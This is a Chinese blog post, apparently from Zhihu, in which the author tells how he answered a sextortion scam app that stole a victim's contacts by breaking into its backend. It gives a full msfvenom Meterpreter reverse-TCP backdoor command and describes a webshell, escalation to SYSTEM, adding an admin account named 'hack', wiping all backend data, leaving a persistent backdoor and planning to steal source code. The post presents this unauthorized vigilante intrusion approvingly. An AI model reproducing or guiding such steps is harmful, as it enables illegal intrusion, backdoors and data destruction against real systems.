下载了一款名叫｛私密空间｝的app我的好友通讯录被盗取！

首先先说一下这个题目的原因吧，我朋友的好友，凌晨两点半给我的朋友打电话，我朋友再通知我这么个回事，朋友说我从电话中都能听到他颤抖的声音，看来被抓住的把柄应该很大！

我说啥事？

他说： 他朋友被人套路了

我说： 咋套路的他呢呀？

他说他和她在QQ上附近人添加认识，聊了很久女方提出不雅要求且要求进行视频互动，谁知之后却被对方录下了不雅视频和下载了一个病毒软件盗取了他的通讯录和他的相册图片！

我说怎么可能呢，软件不都得是要你授权才可以搜集的么？而且如果有病毒手机不会提醒？

他说：他点了，什么都点了，也提醒了有病毒，上头了那会他，哪管那么多直接下载注册了。

下载完了之后他就翻脸了，变成男的打电话过来了，还发了我的通讯录和不雅视频跟我说要我打5000块钱解决，我没给他就一直威胁我说要群发出去。咋办啊啊！

我说不要急，怕什么，现在不都流行这种敲诈勒索案嘛，百度一搜警方的回答和网友的回答都说了没事。

可他还是慌的一批哈哈哈，我说那你把软件发给我，我看看这个软件啥子情况哦。

然后他发了过来，我就带着嘲笑的心情下载了，但是好友说这软件会获取通讯录但咱还是把通讯录清理好先，以防万一。

下载后第一感觉就是这种软件没啥特别的呀，下载好了进行登录，一进去就强制索要我的通讯录、GPS、短信、相册等30多项权限，这是强制执行的，我点击不同意就退了出来（明白我的意思了吧）

然后再一次点击同意就进去了，然后就是按我朋友说的骗子要我们注册账号和输入邀请码，我哪懂什么邀请码，随便输入一个得了，号码就写自己的吧，反正我通讯录都清理好了……

登录.......进不去！大概都是这么一个情况吧大家？

那我想肯定就只到这里了，这鱼钓的可真的是大摇大摆，普通人肯定认为这是网络故障还是啥子故障了........

OK看完了客户前端没啥意思，那就开始尝试一下能不能搞出点花样来，那么既然客户前端页面登录进不去了那咱们就换一种方式进去，进哪呢？进管理员的核心通道！！！！哎，本次目的之一.......

在房间里四处寻找一个小时终于找到了我尘封已久的【拯救者 Y7000P】

专业的电竞144Hz屏幕，搭载i7+1660Ti的配置，性能表现着实靠谱。而一体化的散热模组和涡轮增压双风扇，既能始终高效，也可以保持较低的噪音。就是有点脏灰了而已，咳咳。

话不多说，充电头插进我电脑的充电口_______按住开机键______整个过程行云于流水一般一气呵成，献丑啦各位！

...........

插排没插上........

OK，一顿操作猛如虎之后打开了我锁住抽屉上5公斤的钥匙拿出了我当年考试拿到的证书......用手一摸就想起了以前在学校努力学习的奋斗情形，那时的我秀发飘飘，远看像周杰伦，近看像陈冠希，如果用一个字来形容当时的自己那只有【酷】字来形容了！

咳咳，不要忘了我们是干嘛的，咱们的专业摆在这呢对不对！

那么针对软件的数据测试与检测漏洞的工具咱们也是有所准备的

不跟你们开玩笑了

Yersinia

Yersinia是一个强大的网络渗透测试工具，能够对各种网络协议进行渗透测试。如果你上当受骗了那么可以试试这个工具进行，教程烂大街不介绍了！

如果你是电脑小白又不懂英文那么我建议使用Flidder（中文版）因为Flidder的使用教程网上比较全面也比较透彻！

OK，不管你使用什么抓包工具还是渗透工具，总之你要找的无非就是漏洞，那么什么是漏洞？

简单来说就是像我朋友上当的这个软件，他的这个软件的漏洞就是 后台管理员登录地址漏了，也就是这个地址 http:// txlqltxl.cn/api/uploads /api 这就是漏洞，咱找着滴。你们点击肯定点不开，我天生聪明睿智的头脑怎么会告诉你如何打开呢？

你们读者可能认为这怎么可能是漏洞呢？或者包括计算机专业人士说这怎么可能是漏洞！

这不是漏洞吗？不漏我怎么可能找到？

应该隐藏的好好的。

你们说如果一个保险柜里面装着许多钱藏的不够隐秘被我找到了在某个房间角落里，我要再是能找到对应的账户密码打开保险柜的这个门，那......我是不是就让保险柜的主人给造成损失了呢？

那又如果你们这些喜欢在某些app上注册账户看某国大片的、或者在购物app上买女朋友的数据信息被我入侵平台查看你所注册信息、下单的信息和app后台数据库，我不得看的一清二楚？仔细具体到点上这是不是对你、对这个平台造成影响以及损失了呢？

我看得清楚了我不会对着屏幕狂笑？哈哈哈哈哈，你居然要买女朋友！

后台只是其次，如果真的能破门而入那么就可以抹掉我好友的朋友信息了。

我更好奇的是我能不能把这个app的｛源代码｝给扒下来为我所用，毕竟这年头源码能换马宁、（一分都卖）

.............想了许久 先把朋友交代的事情弄好，毕竟朋友说这好友愿意将他珍藏多年的苍老师赠送与我，我何乐而不为呢？

OK，很多的细节在这里不一一说明了 简单明了

我拿到webshell了后利用MSF(metasploit)来进行提权

msfvenom生成一个EXE的姆鷌后门

然后在到MSF根据刚才配置的姆鷌后门进行监听...【msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=.

***.***.1.7 LPORT=4444 -f exe > abc.exe】

然后在把姆鷌上传到服务器的机器里，必须上传到可读可写的目录下哦！

提权成功！

既然有了system权限 那我们在添加账号hack

添加为管理员（admin）组

额，现在是可以干啥了？登录了霍，既然咱们拥有管理权限，那么就开始吧。

https://www.zhihu.com/video/1366755372422750208

进入后台

找朋友的朋友的信息

测试一下功能GPS定位

找到后我直接删除所有信息，不留痕迹。

顺手把后台所有数据一键清空......

后台转了很久很久，可还是没有所谓的不雅视频，所以视频和通讯录是分离储存的，通过朋友的朋友说视频在另一个软件上.......那就只能再去看看那个软件到底是什么了，能不能搞掉重要的东西就看运气了，说不定已经删除了呢？

这后台里面有几个功能：通讯录、导出通讯录、导出短信、短信查看、GPS定位、清空通讯录、删除！

那么可以查看到管理员登录的IP地址，像我刚才登录的IP地址任何人查询都会显示在 ：美国洛杉矶啦

不止如此，通讯录上当者数量也是非常的多，所以这骗子为啥能骗到这么多人也是有手段的。

OK，那么现在要做的事情做完了，咱们既然好不容易进来一次，要做就做到极致，把这整个源代码给扒下来，说不定我哪天火了有JC找我破案捏......（发财了）

后门已经留好了，放心的退出系统。

总之啊，一般别人主动找你给你好处的一定要小心小心再小心，不要有一丝的松懈呀，我的朋友认识我懂得消除个人隐私，那么像普通人呢？他们的隐私如何处理？

总之只要是骗就一定不能给钱呀 给了钱呀我想这无底深渊是没有底的！

后续朋友的朋友到底视频发或不发咱们持续更新吧，下一篇文章我想应该是录制视频的软件管理系统了！